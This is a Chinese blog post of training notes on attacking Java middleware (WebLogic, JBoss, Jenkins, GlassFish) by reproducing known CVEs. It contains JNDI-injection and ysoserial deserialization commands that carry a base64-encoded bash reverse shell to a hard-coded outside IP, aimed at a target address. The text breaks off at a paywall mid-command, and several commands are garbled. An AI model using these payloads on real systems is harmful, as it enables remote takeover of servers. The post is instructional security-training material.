网络安全全栈培训笔记(60-服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish)

最新推荐文章于 2024-05-28 17:11:53 发布
VIP文章 最新推荐文章于 2024-05-28 17:11:53 发布
阅读量1.3k 收藏 17
点赞数 22
分类专栏: 网络安全全栈学习笔记 文章标签: 安全 web安全 笔记 网络安全 jenkins 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46343633/article/details/135935804
版权

第60天 服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish

在这里插入图片描述
在这里插入图片描述

知识点:

中间件及框架列表:

lIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,
GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Sprng,Flask,jQuery
1、中间件-Weblogic安全
2、中间件JB00S安全
3、中间件-Jenkins:安全
4、中间件-GlassFish安全

章节内容:

常见中间件的安全测试:
1、配置不当-解析&弱口令
2、安全机制特定安全漏洞
3、安全机制-弱口令爆破攻击
4、安全应用框架特定安全漏洞

前置知识:

中间件安全侧试流程:
1、判断中间件信息名称&版本&三方
2、判断仲间件问题-配置不当&公开漏洞
3、判断中间件利用-弱口令&EXP&框架漏洞
应用服务安全测试流程:见图
1、判断服务开放情况端口扫描&组合应用等
2、判断服务类型归属数据库&文件传输&通讯等
3、判断服务利用方式持定漏洞&未授权&弱口令等

演示案例

中间件Weblogic-工具搜哈
中间件JBoos-工具脚本搜哈
中间件-Jenkins-工具脚本搜哈
中间件-GlassFish-工具脚本搜哈
配合下-FofaViewer-.工具脚本搜哈

中间件-Weblogic-工具搜哈

探针默认端口:7001,Weblogic.是Oracle公司推出的J2EE应用服务器
Cve20173506工具
Cve_20182893工具
Cve20183245I具
cve202014882工具
以上均可使用工具 脚本小子警告!!!!
这里只复现一个
在这里插入图片描述

Cve-2021-2394反序列化 https://github.com/lz2y/CVE-2021-2394
https://github.com/welk1n/JNDI-Injection-Exploit vps生成idap监听端口
编码:bash>&1 dev/tcp/47.94.236.117/55660>&1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C “bash -c
(echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LZU1NjYgMD4mMQ==)
I(base64.-d)/(bash,-”-A47.94.236.117
发送数据触发
java -jar CVE_2021_2394.jar123.58.236.7632185ldap:147.94.236.117.1389/x1nfdy
使用方法 java -jar CVE_2021_2394.jar[目标地址] [生成的IDAP回连地址]

思路:首先VPS生成iadp监听端口–
在VPS使用JNDI工具生成idap回连地址并监听端口
再在攻击机使用exp利用反弹shell

中间件-JBOOS-工具脚本搜哈

Jb0ss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,
Red Hat JBoss Application Server是一款基于JavaEE的开源应用服务器。
1、CVE-2017-12149

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash-c
(echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LZU1NjYgMD4mMQ==)
l(base64,-d)l(bash,-i
最低0.47元/天 解锁文章
清歌secure
关注
  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
服务攻防-中间件安全&CVE &Weblogic&Jenkins&GlassFish
m0_61506558的博客
12-19 490
(一)中间件-Weblogic安全(一)中间件-Weblogic安全探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器,检测工具,如下github链接2.cve_2018_2893 工具3.cve_2018_3245 工具4.cve_2020_14882 工具。
服务攻防-中间件安全&CVE &K8s&Docker&Jetty&Websphere
m0_61506558的博客
12-20 647
Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。它从容器中逃了出来,因此我们形象的称为Docker逃逸漏洞
第60天-服务攻防-中间件安全&CVE &Weblogic&&Jboss&Jenkins&GlassFish
weixin_52529261的博客
02-15 1281
主要学习了解Weblogic、JBoos、Jenkins和GlassFish四个中间件的常见CVE、未授权和弱口令等漏洞。
中间件安全-CVE&Weblogic&Jenkins&GlassFish漏洞
rumil的博客
10-22 1198
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。,达到产品级质量,可免费用于开发、部署和重新分发。JBoss是一个管理。
网络安全培训笔记(59-服务攻防-中间件安全&CVE&lS&Apache&Tomcata&Nginx)
qq_46343633的博客
01-30 1332
中间件及框架列表:1、中间件-IIS短文件&解析&蓝屏等2、中间件-Nginx-文件解析&命令执行等3、中间件-Apache-RCE&目录遍历&文件解析等4、中间件-Tomcat-弱口令&文件上传&文件包含等。
60、服务攻防——中间件安全&CVE&weblogic&Jenkins&GlassFish
qq_55202378的博客
03-22 580
默认端口:7001,历史漏洞:CVE_2017_3506、CVE_2018_2893、CVE_2018_3245、CVE_2020_14882、CVE_2021_2394。历史漏洞:CVE-2017-12149、CVE-2017-7504。
第60天:服务攻防-中间件安全&CVE&Weblogic&Jenkins&GlassFish
weixin_71529930的博客
04-15 1476
jboss通常占用的端口为1098,1099,4444,4445,8080,8009,8063,8093。fofa搜索:"glassfish" && port="4848" && protocol="http"序列化的操作,运行java脚本,echo 后面是反弹shell的base64编码,生成可以利用的poc。fofa搜索: "JBoss" && title=="Welcome to JBoss™"这里尝试直接利用下面的语句getshell失败,个人猜测,可能是命令太长,各种符号转义了。
第59天-服务攻防-中间件安全&CVE &IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 856
本文章涉及Apache、Tomcat及Nginx等中间件重要的CVE漏洞
中间件安全-CVE &K8s&Docker&Jetty&Websphere漏洞
rumil的博客
10-25 4787
IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。Docker 容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行 POC 或 EXP,就可以返回一个宿主机的高权限 Shell,并拿到宿主机的。root 权限,可以直接操作宿主机文件。
CVE-2022-22980 exp && 靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar
02-11
WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-...
CVE-2020-14882​&14883:Weblogic RCE1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
内网安全--域渗透准备知识
金灰的博客
05-22 704
通过域成员主机,定位出域控制器 IP 及域管理员账号,利用 域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性, 定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进 而拿下域控制器、渗透整个内网.某个域用户需要使用 viso 软件进行绘图操作,于是联系网络管理员进行安装,网络管理 员采用域管理员身份登录了域成员主机,并帮助其安装了 viso 软件,于是这个有计算机 基础的员工,切换身份登录到了本地计算机的管理员,后执行。
简单3步,ERP、OA、CRM等客户端,安全远程访问服务
oray2013的专栏
05-22 282
然而,如何确保在不同地点的员工都能安全、便捷地访问公司内网的C/S(Client/Server)架构办公系统,是一个亟待解决的问题。采用贝锐花生壳内网穿透服务,可以简化这些步骤,使得远程访问变得异常简单。无需公网IP,无需繁琐的路由和网关配置,简单三步,即可实远程访问。目前,除了上述举例的ERP系统,市面上主流C/S(Client/Server)架构办公系统均可搭配贝锐花生壳实远程访问。传统的远程访问解决方案往往需要杂的网络配置,包括公网IP的申请、路由和网关的设置等。
智能视频监控技术为游泳馆安全护航,助力安全管理新升级
最新发布
TSINGSEE青犀视频官方技术博客
05-28 442
通过高清摄像头、视频监控平台和AI智能分析系统的结合,实了对游泳馆内各区域的面覆盖和实时监控,为游泳馆的安全管理提供了有力支持。
浏览器提示网站不安全怎么办?有什么解决办法吗?
JoySSL230907的博客
05-28 776
一招教你轻松解决
Redhat9 LAMP安全配置方案及测试
weixin_75145375的博客
05-23 1272
mariadb是mysql的一个分支,比起mysql具有更好的性能。输入cd /var/www/html/phpMyAdmin/即ip地址/phpMyAdmin/index.php。
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞在Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值